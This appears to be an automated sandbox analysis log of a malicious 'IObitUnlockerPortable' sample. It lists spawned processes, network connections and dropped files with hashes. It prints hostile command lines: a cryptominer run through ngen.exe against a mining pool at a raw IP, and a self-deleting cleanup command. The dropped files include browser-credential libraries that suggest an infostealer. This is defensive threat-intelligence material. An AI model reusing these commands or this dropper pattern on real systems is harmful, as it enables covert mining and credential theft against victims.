C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEHJJECAEGC" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.0.538412111\1471104155" -parentBuildID 20230214051806 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c001e780-cc49-4766-b76a-fb41da8cdbeb} 648 "\\.\pipe\gecko-crash-server-pipe.648" 1820 22dff70be58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.1.976581163\812879614" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2364 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee425386-4e5e-4c61-9d58-28581e0794e2} 648 "\\.\pipe\gecko-crash-server-pipe.648" 2404 22dfa18a258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.2.276617210\1290439756" -childID 1 -isForBrowser -prefsHandle 2960 -prefMapHandle 2956 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {913c1fd9-3ffa-4473-8f76-758d5e7183a0} 648 "\\.\pipe\gecko-crash-server-pipe.648" 2972 22d89e10258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.3.1649985592\649095188" -childID 2 -isForBrowser -prefsHandle 3764 -prefMapHandle 3760 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a12ff2f-f4cd-4feb-9871-c2ca1e1ba4ca} 648 "\\.\pipe\gecko-crash-server-pipe.648" 3744 22d8c153858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.4.1746152309\1209004020" -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5176 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3b6e9ca-a2b7-4964-aa7c-382a00698092} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5136 22d8dd0eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.5.1571410426\2021279235" -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 5252 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {490e2181-a4a0-4f2b-9343-1f9bf802267e} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5396 22d8eb2b158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.6.1448740587\813156455" -childID 5 -isForBrowser -prefsHandle 5576 -prefMapHandle 5580 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d230db5a-1035-47a5-b977-41859cfd7b04} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5564 22d8eb2bd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.7.172155474\401020441" -childID 6 -isForBrowser -prefsHandle 2412 -prefMapHandle 5824 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db5ab5d-6db3-45ba-8507-70317bc9d07a} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5844 22d8f408358 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
/updateInstalled /background
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| BE | 2.17.107.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | poocoin.online | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.53.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | businessdownloads.ltd | udp |
| US | 172.67.212.123:443 | businessdownloads.ltd | tcp |
| US | 8.8.8.8:53 | 123.212.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.192.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| FI | 135.181.22.88:80 | 135.181.22.88 | tcp |
| US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | proresupdate.com | udp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:53690 | | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 44.232.194.163:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 163.194.232.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.5.120.34.in-addr.arpa | udp |
| N/A | 127.0.0.1:53696 | | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:80 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | 119.176.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 49.13.126.162:443 | t.workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | 162.126.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.116.9.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| DE | 176.9.34.148:443 | f84.workupload.com | tcp |
| US | 8.8.8.8:53 | 148.34.9.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.iobit.com | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.20.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.194.113.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | logincdn.msftauth.net | udp |
| US | 152.199.21.175:443 | logincdn.msftauth.net | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
Files
memory/1480-0-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-1-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/1480-5-0x0000000074542000-0x0000000074544000-memory.dmp
memory/1480-6-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-7-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-9-0x0000000000400000-0x000000000061B000-memory.dmp
memory/3876-10-0x0000000074531000-0x000000007453F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9341a8d0
| MD5 | 4b6233c76d7e4d29391b7c2f79d9dbb9 |
| SHA1 | 21670d0b85fa4f7f1da0cd5504e30ec2d0f36321 |
| SHA256 | a0cb63ed609f4ffe95b9e49a5308020e2fdba6f4ce621f851afb21fa7d46ff42 |
| SHA512 | cd052a366f9f2ed80d3226fada1e5fbc638bc9661450cc179c008a895e66fa4b6bfa778e14cd6160099293bf05b85383e18143c8145bbc15cd5cbf2c5877b45a |
memory/3876-12-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/3876-14-0x000000007453E000-0x0000000074540000-memory.dmp
memory/3876-15-0x0000000074531000-0x000000007453F000-memory.dmp
memory/3876-19-0x0000000074531000-0x000000007453F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dcom.au3
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
memory/4360-21-0x0000000001000000-0x000000000174B000-memory.dmp
memory/4360-23-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/4360-24-0x0000000001000000-0x000000000174B000-memory.dmp
memory/4360-25-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\ProgramData\DAEHJJECAEGC\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\DAEHJJECAEGC\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\AAKEGDAKEH.exe
| MD5 | 6cfddd5ce9ca4bb209bd5d8c2cd80025 |
| SHA1 | 424da82e9edbb6b39a979ab97d84239a1d67c48b |
| SHA256 | 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7 |
| SHA512 | d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8 |
memory/4640-112-0x0000000000FE0000-0x00000000014F3000-memory.dmp
C:\ProgramData\DGDBAKKJKK.exe
| MD5 | daaff76b0baf0a1f9cec253560c5db20 |
| SHA1 | 0311cf0eeb4beddd2c69c6e97462595313a41e78 |
| SHA256 | 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c |
| SHA512 | 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3 |
memory/1960-123-0x0000000000A70000-0x0000000000CB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\744435fe
| MD5 | c62f812e250409fbd3c78141984270f2 |
| SHA1 | 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806 |
| SHA256 | d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8 |
| SHA512 | 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092 |
memory/1960-135-0x0000000072450000-0x00000000725CB000-memory.dmp
memory/4640-136-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/4640-133-0x0000000072450000-0x00000000725CB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\74b16f26
| MD5 | 8d443e7cb87cacf0f589ce55599e008f |
| SHA1 | c7ff0475a3978271e0a8417ac4a826089c083772 |
| SHA256 | e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a |
| SHA512 | c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5 |
memory/1960-137-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/4360-141-0x0000000001000000-0x000000000174B000-memory.dmp
memory/4360-142-0x0000000001000000-0x000000000174B000-memory.dmp
memory/4640-152-0x0000000072450000-0x00000000725CB000-memory.dmp
memory/1960-154-0x0000000072450000-0x00000000725CB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\77246341
| MD5 | 869568ca5eab4ae88f8eb4c78605d5f4 |
| SHA1 | ea07a3c4974711541c6d0c93b9ad2ed1e4a244d7 |
| SHA256 | 9ba1c5826a0d7bc33b9407c28969054b83685e847bea466edb40b79a7ad1c9f5 |
| SHA512 | 86e6f8ca9c6309ca8065c527c61b8c8c71ba1884cb3274c9335083773c9d1bf19c76f5da1ff386803c8f05fd0c5bd4e03db5f4990e01abe247a343f15b702ac2 |
C:\Users\Admin\AppData\Local\Temp\777f9256
| MD5 | 6a2171a1f52771a6986e671bb95a10c6 |
| SHA1 | 1186bf9f7391fb434816548690cf11394880fe7c |
| SHA256 | 26a2dd40a538f7e2d0e4642405ab512dc75cbfd9b68b1021d84b098f0a2b4178 |
| SHA512 | 6d9f5a12032b9e772ee7cf1aa38f82aa8e3458f03f686bb396f5836e7191adc40aaadf380e28a9c0ea048f48e814f8b92b3b4d2835da26a89d420653e976269b |
memory/4360-160-0x0000000001000000-0x000000000174B000-memory.dmp
memory/700-161-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/4932-162-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
C:\ProgramData\DAEHJJECAEGC\VCRUNT~1.DLL
| MD5 | a37ee36b536409056a86f50e67777dd7 |
| SHA1 | 1cafa159292aa736fc595fc04e16325b27cd6750 |
| SHA256 | 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825 |
| SHA512 | 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356 |
C:\ProgramData\DAEHJJECAEGC\softokn3.dll
| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
| SHA512 | 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6 |
C:\ProgramData\DAEHJJECAEGC\msvcp140.dll
| MD5 | 5ff1fca37c466d6723ec67be93b51442 |
| SHA1 | 34cc4e158092083b13d67d6d2bc9e57b798a303b |
| SHA256 | 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062 |
| SHA512 | 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546 |
memory/4932-169-0x0000000072450000-0x00000000725CB000-memory.dmp
memory/4932-178-0x0000000072450000-0x00000000725CB000-memory.dmp
memory/4428-181-0x00007FFB81E80000-0x00007FFB834F7000-memory.dmp
memory/3248-185-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/4428-186-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3248-189-0x0000000000470000-0x00000000004E1000-memory.dmp
memory/1476-191-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-193-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-194-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-195-0x000001E06E7B0000-0x000001E06E7D0000-memory.dmp
memory/1476-197-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-199-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-198-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-196-0x0000000140000000-0x00000001407DC000-memory.dmp
memory/1476-200-0x0000000140000000-0x00000001407DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\60454e1e
| MD5 | 1ddd28d4f20c0cf3039000e8e8aa58c3 |
| SHA1 | 28d99295492b1249c1e9cd8084b882e23842f48c |
| SHA256 | 50d5d9e358f70aa3c314149c9d17f7efa1da0d78d399caa58b7649db7441d4ea |
| SHA512 | 90cda006c7d6f48e5ad87510df1523d2928eca2f9fd066de3348e0afc1710ddd9389e3314b554ce022d952c6e6c8cfba2fee06bc010c6bdd94a5ec76ca235072 |
C:\Windows\Tasks\Watcher Com SH.job
| MD5 | 6442fe0a22ea3242898c959e6e3aa2ed |
| SHA1 | acce2cde3a5a66b7db7eabf58354d307617e47d3 |
| SHA256 | 5e1d7d028cf372b0ec73647d65561d2fe7e90cd18a28917dd71aab48914bf3f8 |
| SHA512 | 08f935f91fbd5364a79872109264b470cd4b154e797ff00c196d46cf3cfea71a23cbcbbe1f72b2ee609be2839f08f87f0a42fa16609d5a94c8726e56137a4aaa |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log
| MD5 | f26118d675c61402c218ac6794d90a63 |
| SHA1 | ffc8d592f3ca8255ca5119eff5b576eb16ac7fac |
| SHA256 | d049789c187b2f58c900eab10205bc037740dca8640ab40c314790fefaab66ff |
| SHA512 | 6f14b71dae095131053a1b590e60ccec4e14c47c745bf9d52de48988d7b93b1f50bbb6bac0222dc49e3e45def052b20be2d34e116991027718da2e0fb8eb45d0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\prefs.js
| MD5 | 9b3282b2313ba4447c37932bfb4840bc |
| SHA1 | cbceede3fe407d581f02b9a7fd2f7405f4d2202b |
| SHA256 | 85252de0541a46f0ab0aa13e568fe3002e9f8e0bd11c220f3c5191329e063b5f |
| SHA512 | da8fdfcfd81a02e2759c4a74fad3e3a73fb53eb5d90e2a819ead4a1ce5f215f08c4e436d32c1831eb4792413c03c5d49a9d61b1bfc1f0a221af7dd0e2518cf51 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 9c52f50203f70b86afb604edb7510d8e |
| SHA1 | c71d17621de616a6cc0f9256ae4480884deaf0d6 |
| SHA256 | 033be10c09abcef0567d0497548fb2ac58664ed40944e78265414abf0312a43b |
| SHA512 | 4f5605e844ce5af7f6adbc75e033c8a4ed939441f8abaf438ee568b42bb902dd58ddae6fcf05fc92e08abf2f72d1ac7d960a6a253e9d9776f9b387d6e21e7191 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 87c7cd8095841c643a9c4a7624cc3ae1 |
| SHA1 | d181feff4f2cb0d9c55b5dac14942b092df43e67 |
| SHA256 | 1ce6715a87cfde6904cf316df7178f2c6b112191232e8202330f40ac9f55a6c0 |
| SHA512 | 221663b71f9cd1d3a05829c9808da68c10480d64c5e848d27039bbae6338b45739e662829ee9f99aa9ad2595685e77745dea841cca19e5e4d97e32bf4c27df5b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\prefs.js
| MD5 | b55dc14c48ad70ab9e2d3ffdc641f8a0 |
| SHA1 | 5214528de566fe1e13feffb84433f298ca1f01a3 |
| SHA256 | 959af16de6b30af8cdb96a7610b3cf9832adb629e4fb5b287cf9428408e3b1b0 |
| SHA512 | 1b706b2d78a84bc9742f7bc9acc6f2545709f4f2a29cb23899f6e6f995d3c9106985eb00f28639500da3ff9b7c1b483b294c5084b8964ab8b97dcba927cd51ac |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\prefs.js
| MD5 | 6417b2ea9b72f39b54208cf08d6c62fd |
| SHA1 | 750dab02da4b75e581e851d1a496193288d54bea |
| SHA256 | 47c365791683bb067f7926e8ba6870a20e170bdcc1b58b51a2fd744af1f30e13 |
| SHA512 | c0f46636edb5efbb22c1697c41ba7d0463c4653b572ce18e229ea2757a6b8da163116f15c4e1e35fe317e1040b998840bad93dc7e2dc81038721675ffc3154b4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 3d1e7e96261649b6fe3e29ea37e51b48 |
| SHA1 | 1b9a9776e825a7daab66f78d13b33da05c311781 |
| SHA256 | 93a77edb9848d6dc9f11444f190be101cda0dbb341866e5f8eb68eec4dd5edda |
| SHA512 | 552dc800eb16320612285b87be0b341b2b15bbe3ee6d8f1065c81d22798dcd29388fd80e84a3fe28de94bfdb37070dcb909afd97367a94e7c76544d817c61f84 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\29078
| MD5 | 6903d2271f28d6a96b1eaf65bcc34c73 |
| SHA1 | 846843353ae93def365fad648426128d2da8f1a8 |
| SHA256 | 19edf2365f24185adadae1556e0f54cbb5eaf9108d0ef8a2795c988612931583 |
| SHA512 | cadd2342a8beac732e25acb04b31397b47216e21c53c3d8402691c8935d71d6207abefb5e088b74e865d0e452faf161481f6f50e5694a1beb5edf94193735c31 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\93
| MD5 | 990d47501b225b0f571bf661dc53ca19 |
| SHA1 | ab6ab498e2df15e42a66cb46fe6ce5ca30571f1a |
| SHA256 | a3a1ab694f84cb36888ced3655b051201c682088cd9a7bfcd55bf3f856a722a7 |
| SHA512 | 5ef43ae65aa5bba8c5cc0b0e2312ceb6b3008ab183117175462cf79f69cb7b0df2f7ef57c4454e1e9c18ded3ffa5f0bd3d564cb1b2d3c0e9b9a3a2104d85b829 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\11004
| MD5 | 8d79aced1cfd9a7b6177e2ebdd52532c |
| SHA1 | 181a5ab24b9eaa54997ba21bc1874be7af964b41 |
| SHA256 | f7989bc2655e36a7f2b5576e65aceaee96ad07ce6a77e285732fdadb49d07e3b |
